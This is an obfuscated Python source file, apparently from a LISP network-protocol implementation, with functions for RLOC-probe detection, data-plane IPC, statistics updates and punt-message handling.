if 98 - 98: Ii1I / oO0o * O0 + I1Ii111 - I1Ii111 + iII111i
if 4 - 4: i1IIi
if 43 - 43: oO0o * ooOoO0o - I11i
if 70 - 70: oO0o / Ii1I
if 15 - 15: iIii1I11I1II1 % ooOoO0o % i11iIiiIii
if 16 - 16: iII111i
if 50 - 50: iIii1I11I1II1 - II111iiii % i1IIi
if 48 - 48: O0
if 60 - 60: ooOoO0o - IiII % i1IIi
def lisp_is_rloc_probe ( packet , rr ) :
Ii1iiI1 = ( struct . unpack ( "B" , packet [ 9 : 10 ] ) [ 0 ] == 17 )
if ( Ii1iiI1 == False ) : return ( [ packet , None , None , None ] )
if 5 - 5: oO0o
iiI1iiIiiiI1I = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
i111I1 = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
IiiiiII1 = ( socket . htons ( LISP_CTRL_PORT ) in [ iiI1iiIiiiI1I , i111I1 ] )
if ( IiiiiII1 == False ) : return ( [ packet , None , None , None ] )
if 8 - 8: O0 * Oo0Ooo - o0oOOo0O0Ooo * OoO0O00
if ( rr == 0 ) :
I1IO0O00o0oo0oO = lisp_is_rloc_probe_request ( packet [ 28 : 29 ] )
if ( I1IO0O00o0oo0oO == False ) : return ( [ packet , None , None , None ] )
elif ( rr == 1 ) :
I1IO0O00o0oo0oO = lisp_is_rloc_probe_reply ( packet [ 28 : 29 ] )
if ( I1IO0O00o0oo0oO == False ) : return ( [ packet , None , None , None ] )
elif ( rr == - 1 ) :
I1IO0O00o0oo0oO = lisp_is_rloc_probe_request ( packet [ 28 : 29 ] )
if ( I1IO0O00o0oo0oO == False ) :
I1IO0O00o0oo0oO = lisp_is_rloc_probe_reply ( packet [ 28 : 29 ] )
if ( I1IO0O00o0oo0oO == False ) : return ( [ packet , None , None , None ] )
if 100 - 100: O0 + I1ii11iIi11i * I1IiiI
if 16 - 16: OoO0O00 / oO0o * OoO0O00 / I11i
if 94 - 94: II111iiii - ooOoO0o
if 13 - 13: oO0o - OoooooooOO
if 48 - 48: ooOoO0o % ooOoO0o / OoooooooOO + i1IIi * oO0o + ooOoO0o
if 69 - 69: iII111i . iII111i
OO = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
OO . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
if 46 - 46: IiII * Oo0Ooo + I1Ii111
if 79 - 79: IiII
if 89 - 89: IiII * I11i + I1ii11iIi11i * oO0o - II111iiii
if 58 - 58: ooOoO0o . I1Ii111 / i1IIi % I1ii11iIi11i + o0oOOo0O0Ooo
if ( OO . is_local ( ) ) : return ( [ None , None , None , None ] )
if 94 - 94: i11iIiiIii + I1Ii111 . iII111i - ooOoO0o % I1Ii111
if 94 - 94: i11iIiiIii - OOooOOo - O0 * OoooooooOO - ooOoO0o
if 35 - 35: iII111i . i11iIiiIii - OOooOOo % Oo0Ooo + Ii1I . iIii1I11I1II1
if 91 - 91: o0oOOo0O0Ooo / OoO0O00 + I1IiiI % i11iIiiIii % i1IIi
OO = OO . print_address_no_iid ( )
O00oo0o0o0oo = socket . ntohs ( struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ] )
O0O00O = struct . unpack ( "B" , packet [ 8 : 9 ] ) [ 0 ] - 1
packet = packet [ 28 : : ]
if 22 - 22: I1Ii111 * O0 % OoO0O00 * I1ii11iIi11i
I1I1iIiiiiII11 = bold ( "Receive(pcap)" , False )
iiI1i1I = bold ( "from " + OO , False )
o00oo = lisp_format_packet ( packet )
lprint ( "{} {} bytes {} {}, packet: {}" . format ( I1I1iIiiiiII11 , len ( packet ) , iiI1i1I , O00oo0o0o0oo , o00oo ) )
if 47 - 47: OoO0O00 / OOooOOo / OoOoOO00 % i11iIiiIii / OoOoOO00
return ( [ packet , OO , O00oo0o0o0oo , O0O00O ] )
if 52 - 52: ooOoO0o / I11i % i11iIiiIii - I1Ii111 % ooOoO0o - o0oOOo0O0Ooo
if 67 - 67: OoOoOO00 / I1Ii111 + i11iIiiIii - IiII
if 79 - 79: I11i . I11i - OoOoOO00
if 86 - 86: OoO0O00 * Oo0Ooo . iIii1I11I1II1 * O0
if 52 - 52: iII111i - i11iIiiIii + o0oOOo0O0Ooo + i1IIi
if 58 - 58: OOooOOo - Ii1I * I1Ii111 - O0 . oO0o
if 72 - 72: i1IIi * iII111i * Ii1I / o0oOOo0O0Ooo . I1Ii111 + i11iIiiIii
if 33 - 33: I11i / OoO0O00 * ooOoO0o + iIii1I11I1II1
if 54 - 54: Oo0Ooo / IiII + i11iIiiIii . O0
if 94 - 94: OoooooooOO + iII111i * OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: iIii1I11I1II1 / iIii1I11I1II1 / II111iiii
def lisp_ipc_write_xtr_parameters ( cp , dp ) :
if ( lisp_ipc_dp_socket == None ) : return
if 93 - 93: oO0o
ii1I11Iii = { "type" : "xtr-parameters" , "control-plane-logging" : cp ,
"data-plane-logging" : dp , "rtr" : lisp_i_am_rtr }
if 53 - 53: OoO0O00 * i1IIi / Oo0Ooo / OoO0O00 * ooOoO0o
lisp_write_to_dp_socket ( ii1I11Iii )
return
if 77 - 77: iIii1I11I1II1 % I1IiiI + o0oOOo0O0Ooo + I1Ii111 * Oo0Ooo * i1IIi
if 14 - 14: iIii1I11I1II1 * iIii1I11I1II1 - OOooOOo . iII111i / ooOoO0o
if 54 - 54: OoOoOO00 - I1IiiI - iII111i
if 49 - 49: i11iIiiIii * Oo0Ooo
if 100 - 100: Oo0Ooo * oO0o
if 85 - 85: OoooooooOO . IiII / IiII . ooOoO0o . IiII % II111iiii
if 65 - 65: oO0o - OoO0O00 / iII111i + ooOoO0o
if 80 - 80: o0oOOo0O0Ooo + II111iiii * Ii1I % OoOoOO00 % I1IiiI + I1ii11iIi11i
def lisp_external_data_plane ( ) :
i1iii1IiiiI1i1 = 'egrep "ipc-data-plane = yes" ./lisp.config'
if ( getoutput ( i1iii1IiiiI1i1 ) != "" ) : return ( True )
if 46 - 46: Oo0Ooo / Oo0Ooo % iII111i % I1IiiI
if ( os . getenv ( "LISP_RUN_LISP_XTR" ) != None ) : return ( True )
return ( False )
if 85 - 85: OoO0O00 - Ii1I / O0
if 45 - 45: IiII + I1Ii111 / I11i
if 84 - 84: iII111i % II111iiii
if 86 - 86: IiII % II111iiii / i1IIi * I1ii11iIi11i - O0 * OOooOOo
if 53 - 53: OOooOOo * oO0o + i1IIi % Oo0Ooo + II111iiii
if 34 - 34: oO0o % iII111i / IiII . IiII + i11iIiiIii
if 68 - 68: O0 % oO0o * IiII % O0
if 55 - 55: O0 % I1IiiI % O0
if 27 - 27: I1IiiI + I1ii11iIi11i * I1Ii111 % Ii1I - Oo0Ooo
if 87 - 87: i11iIiiIii % OOooOOo - OoOoOO00 * ooOoO0o / Oo0Ooo
if 74 - 74: OoooooooOO * ooOoO0o - I11i / I1ii11iIi11i % iIii1I11I1II1
if 94 - 94: Ii1I * I1Ii111 + OoOoOO00 . iIii1I11I1II1
if 44 - 44: Oo0Ooo . Oo0Ooo * Oo0Ooo
if 23 - 23: I1Ii111 / iII111i . O0 % II111iiii
def lisp_process_data_plane_restart ( do_clear = False ) :
os . system ( "touch ./lisp.config" )
if 67 - 67: I11i / iIii1I11I1II1 / ooOoO0o
OoO0o00OO0O = { "type" : "entire-map-cache" , "entries" : [ ] }
if 89 - 89: Oo0Ooo - I1ii11iIi11i . I1Ii111
if ( do_clear == False ) :
O0O000o00oo = OoO0o00OO0O [ "entries" ]
lisp_map_cache . walk_cache ( lisp_ipc_walk_map_cache , O0O000o00oo )
if 46 - 46: OoO0O00 * I1Ii111 + iII111i . oO0o % OOooOOo / i11iIiiIii
if 1 - 1: I1ii11iIi11i % O0 - I1ii11iIi11i / OoooooooOO / OoO0O00
lisp_write_to_dp_socket ( OoO0o00OO0O )
return
if 82 - 82: i1IIi % Ii1I
if 85 - 85: I1Ii111 * i11iIiiIii * iIii1I11I1II1 % iIii1I11I1II1
if 64 - 64: OoO0O00 / Ii1I
if 79 - 79: Ii1I % OOooOOo
if 39 - 39: I1ii11iIi11i / Ii1I - II111iiii . i1IIi
if 59 - 59: II111iiii
if 36 - 36: ooOoO0o . II111iiii - OoOoOO00 % I1ii11iIi11i * O0
if 91 - 91: iII111i + Oo0Ooo / OoooooooOO * iIii1I11I1II1 - OoO0O00
if 73 - 73: iIii1I11I1II1 % I1Ii111 % II111iiii * Oo0Ooo * OoO0O00
if 48 - 48: OOooOOo * i11iIiiIii - i11iIiiIii + iIii1I11I1II1 + I1IiiI % OoooooooOO
if 61 - 61: i1IIi
if 56 - 56: iIii1I11I1II1 / I11i * iII111i * I11i * OoooooooOO
if 44 - 44: I1ii11iIi11i - OOooOOo % I11i - I1Ii111 / iIii1I11I1II1 - OOooOOo
if 38 - 38: iIii1I11I1II1 - OoooooooOO * II111iiii . OoooooooOO + OOooOOo
def lisp_process_data_plane_stats ( msg , lisp_sockets , lisp_port ) :
if ( "entries" not in msg ) :
lprint ( "No 'entries' in stats IPC message" )
return
if 59 - 59: OoooooooOO
if ( type ( msg [ "entries" ] ) != list ) :
lprint ( "'entries' in stats IPC message must be an array" )
return
if 22 - 22: II111iiii
if 85 - 85: I1Ii111 + I1ii11iIi11i * I11i % o0oOOo0O0Ooo + Ii1I
for msg in msg [ "entries" ] :
if ( "eid-prefix" not in msg ) :
lprint ( "No 'eid-prefix' in stats IPC message" )
continue
if 23 - 23: IiII * OoO0O00
iIiI1I1ii1I1 = msg [ "eid-prefix" ]
if 42 - 42: IiII
if ( "instance-id" not in msg ) :
lprint ( "No 'instance-id' in stats IPC message" )
continue
if 83 - 83: i1IIi * o0oOOo0O0Ooo / OoO0O00 / o0oOOo0O0Ooo
i1oO00O = int ( msg [ "instance-id" ] )
if 55 - 55: Oo0Ooo % O0 - OoO0O00
if 42 - 42: OoooooooOO * OOooOOo
if 93 - 93: OOooOOo + II111iiii . oO0o * Oo0Ooo - O0 + I1Ii111
if 99 - 99: OoO0O00 * o0oOOo0O0Ooo + OoOoOO00 * iIii1I11I1II1
I11I = lisp_address ( LISP_AFI_NONE , "" , 0 , i1oO00O )
I11I . store_prefix ( iIiI1I1ii1I1 )
I11 = lisp_map_cache_lookup ( None , I11I )
if ( I11 == None ) :
lprint ( "Map-cache entry for {} not found for stats update" . format ( iIiI1I1ii1I1 ) )
if 38 - 38: I1ii11iIi11i - OOooOOo * O0 - I1ii11iIi11i
continue
if 95 - 95: OoO0O00 . oO0o . OoooooooOO - iIii1I11I1II1
if 35 - 35: o0oOOo0O0Ooo / OoooooooOO - i1IIi * iIii1I11I1II1 + ooOoO0o
if ( "rlocs" not in msg ) :
lprint ( "No 'rlocs' in stats IPC message for {}" . format ( iIiI1I1ii1I1 ) )
if 66 - 66: Oo0Ooo - OoOoOO00 . I1Ii111 + O0 + o0oOOo0O0Ooo
continue
if 36 - 36: II111iiii % IiII . i11iIiiIii
if ( type ( msg [ "rlocs" ] ) != list ) :
lprint ( "'rlocs' in stats IPC message must be an array" )
continue
if 88 - 88: Oo0Ooo . IiII * Oo0Ooo
oo000oo0Ooo = msg [ "rlocs" ]
if 88 - 88: Ii1I + O0 - ooOoO0o . I1ii11iIi11i % oO0o / OoOoOO00
if 93 - 93: I1ii11iIi11i * o0oOOo0O0Ooo . I11i . I1ii11iIi11i % i1IIi + Ii1I
if 63 - 63: I1IiiI / OoooooooOO
if 16 - 16: OoOoOO00
for oo0II1I11ii1iI in oo000oo0Ooo :
if ( "rloc" not in oo0II1I11ii1iI ) : continue
if 90 - 90: oO0o * Oo0Ooo * oO0o . Ii1I * i1IIi
o00oO = oo0II1I11ii1iI [ "rloc" ]
if ( o00oO == "no-address" ) : continue
if 47 - 47: OOooOOo
OooOOoOO0OO = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
OooOOoOO0OO . store_address ( o00oO )
if 38 - 38: I11i
iII = I11 . get_rloc ( OooOOoOO0OO )
if ( iII == None ) : continue
if 15 - 15: OoO0O00 / ooOoO0o . OoO0O00 - iIii1I11I1II1 + OoooooooOO - OoO0O00
if 44 - 44: O0 . OOooOOo . o0oOOo0O0Ooo . I1ii11iIi11i - II111iiii
if 71 - 71: I1ii11iIi11i + o0oOOo0O0Ooo . i11iIiiIii * oO0o . i1IIi
if 40 - 40: OoO0O00 - IiII
I11i11I = 0 if ( "packet-count" not in oo0II1I11ii1iI ) else oo0II1I11ii1iI [ "packet-count" ]
if 95 - 95: I1IiiI * IiII % iIii1I11I1II1 . Oo0Ooo * o0oOOo0O0Ooo + iII111i
I111iIi1I = 0 if ( "byte-count" not in oo0II1I11ii1iI ) else oo0II1I11ii1iI [ "byte-count" ]
if 18 - 18: OoOoOO00 * o0oOOo0O0Ooo
i1 = 0 if ( "seconds-last-packet" not in oo0II1I11ii1iI ) else oo0II1I11ii1iI [ "seconds-last-packet" ]
if 10 - 10: O0 / i11iIiiIii . OoooooooOO % Oo0Ooo
if 33 - 33: Oo0Ooo + OoO0O00 * I1ii11iIi11i . I1ii11iIi11i / II111iiii
iII . stats . packet_count += I11i11I
iII . stats . byte_count += I111iIi1I
iII . stats . last_increment = lisp_get_timestamp ( ) - i1
if 72 - 72: oO0o % o0oOOo0O0Ooo % i11iIiiIii / IiII * ooOoO0o
lprint ( "Update stats {}/{}/{}s for {} RLOC {}" . format ( I11i11I , I111iIi1I ,
i1 , iIiI1I1ii1I1 , o00oO ) )
if 47 - 47: OoOoOO00 % IiII % OoO0O00 * O0 / OoooooooOO
if 83 - 83: IiII + I1Ii111 . I1ii11iIi11i * iIii1I11I1II1
if 9 - 9: ooOoO0o % IiII - OoOoOO00
if 66 - 66: oO0o % Oo0Ooo
if 40 - 40: i11iIiiIii . O0 * I11i - oO0o / OOooOOo . oO0o
if ( I11 . group . is_null ( ) and I11 . has_ttl_elapsed ( ) ) :
iIiI1I1ii1I1 = green ( I11 . print_eid_tuple ( ) , False )
lprint ( "Refresh map-cache entry {}" . format ( iIiI1I1ii1I1 ) )
lisp_send_map_request ( lisp_sockets , lisp_port , None , I11 . eid , None )
if 86 - 86: OOooOOo - I1Ii111 * IiII - i1IIi + ooOoO0o + I11i
if 32 - 32: IiII
return
if 99 - 99: II111iiii
if 34 - 34: OOooOOo + OoOoOO00 * o0oOOo0O0Ooo + I1ii11iIi11i + IiII * i1IIi
if 73 - 73: I1ii11iIi11i - IiII - O0 . oO0o + Oo0Ooo % iII111i
if 68 - 68: I1ii11iIi11i - OoooooooOO
if 5 - 5: I1ii11iIi11i * I1IiiI + OoooooooOO / Oo0Ooo
if 18 - 18: OoO0O00 * iII111i % I1IiiI . OOooOOo * o0oOOo0O0Ooo
if 58 - 58: iII111i . IiII + iIii1I11I1II1
if 13 - 13: oO0o * I1Ii111 / I1Ii111 . I1IiiI
if 93 - 93: I11i % OoOoOO00 - OOooOOo + iIii1I11I1II1 / OoooooooOO % i11iIiiIii
if 90 - 90: oO0o % iIii1I11I1II1 + o0oOOo0O0Ooo - I11i / i11iIiiIii
if 57 - 57: I1IiiI . Oo0Ooo / I1IiiI / II111iiii - I1Ii111
if 68 - 68: I1IiiI
if 97 - 97: Ii1I + o0oOOo0O0Ooo / OoO0O00
if 97 - 97: i11iIiiIii % iIii1I11I1II1 + II111iiii
if 90 - 90: OOooOOo / I1IiiI
if 28 - 28: OoooooooOO + i1IIi
if 29 - 29: Oo0Ooo
if 98 - 98: OOooOOo / Oo0Ooo % Ii1I * OoooooooOO - oO0o
if 64 - 64: I1IiiI - I1IiiI
if 90 - 90: iII111i - I1IiiI - II111iiii / OOooOOo + Ii1I
if 34 - 34: i11iIiiIii + I1Ii111 / O0 / iIii1I11I1II1 * OoooooooOO % Ii1I
if 32 - 32: i11iIiiIii - OoOoOO00 / iIii1I11I1II1 * o0oOOo0O0Ooo % I1IiiI + O0
if 36 - 36: I1ii11iIi11i + I1ii11iIi11i % I1Ii111 * ooOoO0o * OoOoOO00
if 54 - 54: Oo0Ooo - I1IiiI % OOooOOo . I1ii11iIi11i / I1IiiI
if 75 - 75: OOooOOo - O0 % iII111i . Ii1I % I1ii11iIi11i + I1ii11iIi11i
def lisp_process_data_plane_decap_stats ( msg , lisp_ipc_socket ) :
if 32 - 32: Ii1I + II111iiii * IiII
if 9 - 9: I1Ii111
if 96 - 96: I1Ii111 / iIii1I11I1II1
if 48 - 48: iII111i * IiII + OoooooooOO
if 63 - 63: I1IiiI / Ii1I
if ( lisp_i_am_itr ) :
lprint ( "Send decap-stats IPC message to lisp-etr process" )
ii1I11Iii = "stats%{}" . format ( json . dumps ( msg ) )
ii1I11Iii = lisp_command_ipc ( ii1I11Iii , "lisp-itr" )
lisp_ipc ( ii1I11Iii , lisp_ipc_socket , "lisp-etr" )
return
if 31 - 31: i1IIi - oO0o
if 99 - 99: iII111i - i11iIiiIii + oO0o
if 66 - 66: Oo0Ooo * I11i . iIii1I11I1II1 - OoO0O00
if 11 - 11: I1Ii111 + iIii1I11I1II1 * O0 * Oo0Ooo
if 66 - 66: OoooooooOO % OoO0O00 + i11iIiiIii + I1Ii111 % OoO0O00
if 80 - 80: Oo0Ooo - Ii1I
if 54 - 54: O0 - iIii1I11I1II1 . OoO0O00 . IiII % OoO0O00
if 28 - 28: O0 % i1IIi % OoO0O00 / o0oOOo0O0Ooo . iIii1I11I1II1 - iII111i
ii1I11Iii = bold ( "IPC" , False )
lprint ( "Process decap-stats {} message: '{}'" . format ( ii1I11Iii , msg ) )
if 50 - 50: o0oOOo0O0Ooo + iII111i / i1IIi % II111iiii
if ( lisp_i_am_etr ) : msg = json . loads ( msg )
if 61 - 61: IiII
I11i1iii1I = [ "good-packets" , "ICV-error" , "checksum-error" ,
"lisp-header-error" , "no-decrypt-key" , "bad-inner-version" ,
"outer-header-error" ]
if 28 - 28: oO0o * Oo0Ooo - i1IIi * iIii1I11I1II1 . OOooOOo % Ii1I
for O0o0O0o0 in I11i1iii1I :
I11i11I = 0 if ( O0o0O0o0 not in msg ) else msg [ O0o0O0o0 ] [ "packet-count" ]
lisp_decap_stats [ O0o0O0o0 ] . packet_count += I11i11I
if 60 - 60: Ii1I
I111iIi1I = 0 if ( O0o0O0o0 not in msg ) else msg [ O0o0O0o0 ] [ "byte-count" ]
lisp_decap_stats [ O0o0O0o0 ] . byte_count += I111iIi1I
if 30 - 30: i1IIi * OoO0O00
i1 = 0 if ( O0o0O0o0 not in msg ) else msg [ O0o0O0o0 ] [ "seconds-last-packet" ]
if 80 - 80: I11i
lisp_decap_stats [ O0o0O0o0 ] . last_increment = lisp_get_timestamp ( ) - i1
if 96 - 96: i1IIi - I1ii11iIi11i * iII111i . OOooOOo . OoO0O00
return
if 93 - 93: oO0o * Oo0Ooo * IiII
if 26 - 26: o0oOOo0O0Ooo + O0 % i11iIiiIii . ooOoO0o . I1IiiI + Oo0Ooo
if 90 - 90: IiII * OoooooooOO + II111iiii / iII111i + i11iIiiIii / ooOoO0o
if 20 - 20: II111iiii % I1ii11iIi11i - OoooooooOO * Ii1I / I11i - OoooooooOO
if 11 - 11: I1IiiI + Ii1I + i11iIiiIii * I1ii11iIi11i - oO0o
if 46 - 46: OoooooooOO - Oo0Ooo
if 4 - 4: II111iiii . OOooOOo - Ii1I - i11iIiiIii
if 27 - 27: iII111i * iII111i - OoO0O00 % o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 64 - 64: I1ii11iIi11i * ooOoO0o - OoooooooOO - I1IiiI
if 59 - 59: I1ii11iIi11i . I1Ii111 - OOooOOo / Oo0Ooo + OOooOOo . I1ii11iIi11i
if 69 - 69: Oo0Ooo
if 34 - 34: I1Ii111 - ooOoO0o . o0oOOo0O0Ooo
if 52 - 52: o0oOOo0O0Ooo % I11i * I11i / iIii1I11I1II1
if 77 - 77: OoOoOO00
if 67 - 67: OoooooooOO / OoooooooOO + IiII - ooOoO0o
if 72 - 72: Ii1I
if 21 - 21: ooOoO0o + iII111i
def lisp_process_punt ( punt_socket , lisp_send_sockets , lisp_ephem_port ) :
III11II11i , OO = punt_socket . recvfrom ( 4000 )
if 42 - 42: I11i - O0
Ooo0OO0 = json . loads ( III11II11i )
if ( type ( Ooo0OO0 ) != dict ) :
lprint ( "Invalid punt message from {}, not in JSON format" . format ( OO ) )
if 70 - 70: Ii1I / oO0o + i11iIiiIii - oO0o
return
if 26 - 26: OoO0O00 % I1ii11iIi11i * O0 % OoO0O00
OO0ooOo0oOOOO = bold ( "Punt" , False )
lprint ( "{} message from '{}': '{}'" . format ( OO0ooOo0oOOOO , OO , Ooo0OO0 ) )
if 63 - 63: II111iiii % I11i / I1Ii111
if ( "type" not in Ooo0OO0 ) :
lprint ( "Punt IPC message has no 'type' key" )
return
if 13 - 13: O0 / IiII . OoO0O00 * II111iiii
if 37 - 37: I1Ii111 % ooOoO0o / o0oOOo0O0Ooo
if 22 - 22: IiII * iII111i - I1Ii111
if 30 - 30: I1Ii111 . i1IIi * OoooooooOO * OoooooooOO
if 43 - 43: OoooooooOO * O0
if ( Ooo0OO0 [ "type" ] == "statistics" ) :
lisp_process_data_plane_stats ( Ooo0OO0 , lisp_send_sockets , lisp_ephem_port )
return
if 56 - 56: i1IIi / iIii1I11I1II1 - OoO0O00
if ( Ooo0OO0 [ "type" ] == "decap-statistics" ) :
lisp_process_data_plane_decap_stats ( Ooo0OO0 , punt_socket )
return
if 77 - 77: I1IiiI + IiII - oO0o - I1ii11iIi11i * II111iiii + i1IIi
if 79 - 79: I1ii11iIi11i + O0 * OoooooooOO
if 43 - 43: I11i
if 29 - 29: o0oOOo0O0Ooo / I11i
if 88 - 88: OoOoOO00 - Ii1I . O0 % I1Ii111 % I1ii11iIi11i
if ( Ooo0OO0 [ "type" ] == "restart" ) :
lisp_process_data_plane_restart ( )
return
if 56 - 56: OoOoOO00 - iIii1I11I1II1 / I1IiiI - i1IIi / o0oOOo0O0Ooo * I11i
if 70 - 70: OOooOOo
if 11 - 11: I11i * II111iiii * Oo0Ooo + OOooOOo % i1IIi
if 73 - 73: OoO0O00 + O0 / Ii1I . OoooooooOO % iIii1I11I1II1 * i1IIi
if 84 - 84: o0oOOo0O0Ooo . iII111i / o0oOOo0O0Ooo + I1ii11iIi11i % OoO0O00
if ( Ooo0OO0 [ "type" ] != "discovery" ) :
lprint ( "Punt IPC message has wrong format" )
return
if 52 - 52: OoOoOO00 / Ii1I % OoOoOO00 % i11iIiiIii + I1IiiI / o0oOOo0O0Ooo
if ( "interface" not in Ooo0OO0 ) :
lprint ( "Invalid punt message from {}, required keys missing" . format ( OO ) )
if 63 - 63: I1IiiI
return
if 20 - 20: oO0o + OoOoOO00
if 32 - 32: o0oOOo0O0Ooo % oO0o % I1IiiI * OoooooooOO
if 4 - 4: OOooOOo % oO0o
if 18 - 18: Ii1I * I11i
if 14 - 14: ooOoO0o . ooOoO0o * OoOoOO00 * o0oOOo0O0Ooo - iII111i - I1Ii111
OoO0 = Ooo0OO0 [ "interface" ]
if ( OoO0 == "" ) :
i1oO00O = int ( Ooo0OO0 [ "instance-id" ] )
if ( i1oO00O == - 1 ) : return
else :
i1oO00O = lisp_get_interface_instance_id ( OoO0 , None )
if 53 - 53: Oo0Ooo * OoOoOO00 * II111iiii % IiII - I1ii11iIi11i
if 56 - 56: Oo0Ooo . I1ii11iIi11i - i11iIiiIii / iIii1I11I1II1 . ooOoO0o
if 28 - 28: OoooooooOO + I1IiiI / oO0o . iIii1I11I1II1 - oO0o
if 64 - 64: I1Ii111 + Oo0Ooo / iII111i
if 61 - 61: Ii1I * Ii1I . OoOoOO00 + OoO0O00 * i11iIiiIii * OoO0O00
OoiIii11i11i = None
if ( "source-eid" in Ooo0OO0 ) :
Ooo0o00O0O0oO = Ooo0OO0 [ "source-eid" ]
OoiIii11i11i = lisp_address ( LISP_AFI_NONE , Ooo0o00O0O0oO , 0 , i1oO00O )
if ( OoiIii11i11i . is_null ( ) ) :
lprint ( "Invalid source-EID format '{}'" . format ( Ooo0o00O0O0oO ) )
return
if 4 - 4: OoooooooOO % iII111i % Oo0Ooo * IiII % o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 66 - 66: I1IiiI . Oo0Ooo - oO0o
O0OooOoOo00oo = None
if ( "dest-eid" in Ooo0OO0 ) :
OOO0O = Ooo0OO0 [ "dest-eid" ]
O0OooOoOo00oo = lisp_address ( LISP_AFI_NONE , OOO0O , 0 , i1oO00O )
if ( O0OooOoOo00oo . is_null ( ) ) :
lprint ( "Invalid dest-EID format '{}'" . format ( OOO0O ) )
return
if 61 - 61: Oo0Ooo % I1ii11iIi11i
if 18 - 18: OoOoOO00 * OoOoOO00 - I1Ii111
if 33 - 33: i11iIiiIii * Oo0Ooo % OoOoOO00 - iII111i - Oo0Ooo / iII111i
if 67 - 67: I1Ii111 + i1IIi / o0oOOo0O0Ooo % iII111i / iII111i
if 8 - 8: i1IIi % I11i
if 12 - 12: ooOoO0o / II111iiii + ooOoO0o * I1ii11iIi11i / i1IIi - iIii1I11I1II1
if 71 - 71: IiII - i11iIiiIii
if 3 - 3: i11iIiiIii - o0oOOo0O0Ooo / oO0o . OoO0O00 * I11i + o0oOOo0O0Ooo
if ( OoiIii11i11i ) :
I1i = green ( OoiIii11i11i . print_address ( ) , False )
II1II1Iii1I = lisp_db_for_lookups . lookup_cache ( OoiIii11i11i , False )
if ( II1II1Iii1I != None ) :
if 18 - 18: OoooooooOO % oO0o / IiII - ooOoO0o
if 80 - 80: I11i
if 98 - 98: iII111i / I1ii11iIi11i
if 87 - 87: iII111i - O0 * ooOoO0o / II111iiii % OoooooooOO . o0oOOo0O0Ooo
if 55 - 55: OOooOOo - o0oOOo0O0Ooo * I1IiiI / o0oOOo0O0Ooo + I1Ii111 + iIii1I11I1II1
if ( II1II1Iii1I . dynamic_eid_configured ( ) ) :
i1i1111I = lisp_allow_dynamic_eid ( OoO0 , OoiIii11i11i )
if ( i1i1111I != None and lisp_i_am_itr ) :
lisp_itr_discover_eid ( II1II1Iii1I , OoiIii11i11i , OoO0 , i1i1111I )
else :
lprint ( ( "Disallow dynamic source-EID {} " + "on interface {}" ) . format ( I1i , OoO0 ) )
if 3 - 3: II111iiii % iII111i / IiII * ooOoO0o . OoooooooOO
if 56 - 56: IiII * II111iiii + Oo0Ooo - O0 - OoO0O00 . I1Ii111
if 53 - 53: i1IIi + IiII
else :
lprint ( "Punt from non-EID source {}" . format ( I1i ) )
if 90 - 90: II111iiii / oO0o / oO0o . OoOoOO00 / OoO0O00 / iIii1I11I1II1
if 96 - 96: iIii1I11I1II1 % I1ii11iIi11i
if 35 - 35: i1IIi - OoooooooOO * Ii1I / OOooOOo % I11i
if 72 - 72: I1Ii111 / OoO0O00 + II111iiii
if 40 - 40: Ii1I + O0 . i11iIiiIii % I11i / Oo0Ooo
if 25 - 25: IiII * IiII
if ( O0OooOoOo00oo ) :
I11 = lisp_map_cache_lookup ( OoiIii11i11i , O0OooOoOo00oo )
if ( I11 == None or lisp_mr_or_pubsub ( I11 . action ) ) :
if 54 - 54: I1Ii111
if 90 - 90: Oo0Ooo / Ii1I
if 66 - 66: i11iIiiIii - I11i + oO0o . OoooooooOO
if 77 - 77: OoO0O00 / OOooOOo
if 97 - 97: OoOoOO00 / Ii1I * I1IiiI - Oo0Ooo % O0
if ( lisp_rate_limit_map_request ( O0OooOoOo00oo ) ) : return
if 66 - 66: O0 + I1IiiI % iIii1I11I1II1 . i1IIi % II111iiii - i1IIi
iIiI1IIi1Ii1i = ( I11 and I11 . action == LISP_SEND_PUBSUB_ACTION )
lisp_send_map_request ( lisp_send_sockets , lisp_ephem_port ,
OoiIii11i11i , O0OooOoOo00oo , None , iIiI1IIi1Ii1i )
else :
I1i = green ( O0OooOoOo00oo . print_address ( ) , False )
lprint ( "Map-cache entry for {} already exists" . format ( I1i ) )
if 93 - 93: O0 + OoooooooOO % IiII % oO0o % I1ii11iIi11i
if 36 - 36: I1IiiI - oO0o * Oo0Ooo + oO0o % iII111i - i11iIiiIii
return
if 93 - 93: O0
if 11 - 11: OoooooooOO . I1ii11iIi11i + I1ii11iIi11i
if 73 - 73: OoooooooOO
if 2 - 2: o0oOOo0O0Ooo % IiII + I1ii11iIi11i - i11iIiiIii
if 100 - 100: II111iiii + oO0o
if 85 - 85: I1ii11iIi11i % I1ii11iIi11i . Ii1I
if 42 - 42: oO0o + OoO0O00
def lisp_ipc_map_cache_entry ( mc , jdata ) :
iIiiI11II11i = lisp_write_ipc_map_cache ( True , mc , dont_send = True )
jdata . append ( iIiiI11II11i )
return ( [ True , jdata ] )
if 16 - 16: Ii1I
if 67 - 67: I1ii11iIi11i . OoooooooOO * I1Ii111 + Ii1I * OOooOOo
if 84 - 84: OOooOOo
if 78 - 78: O0 % O0
if 72 - 72: o0oOOo0O0Ooo * IiII / II111iiii / iIii1I11I1II1
if 41 - 41: iII111i / Ii1I
if 11 - 11: Oo0Ooo % OOooOOo . ooOoO0o
if 24 - 24: IiII / Oo0Ooo
def lisp_ipc_walk_map_cache ( mc , jdata ) :
if 90 - 90: ooOoO0o . OOooOOo - Ii1I
if 60 - 60: i11iIiiIii % iII111i . I1IiiI * I1ii11iIi11i
if 30 - 30: Ii1I + i11iIiiIii . I11i + o0oOOo0O0Ooo - OoO0O00
if 55 - 55: ooOoO0o - II111iiii . ooOoO0o . iII111i / OoooooooOO
if ( mc . group . is_null ( ) ) : return ( lisp_ipc_map_cache_entry ( mc , jdata ) )
if 51 - 51: I1IiiI * I1Ii111 - ooOoO0o + IiII
if ( mc . source_cache == None ) : return ( [ True , jdata ] )
if 22 - 22: OoOoOO00 % Ii1I + iII111i
if 64 - 64: ooOoO0o
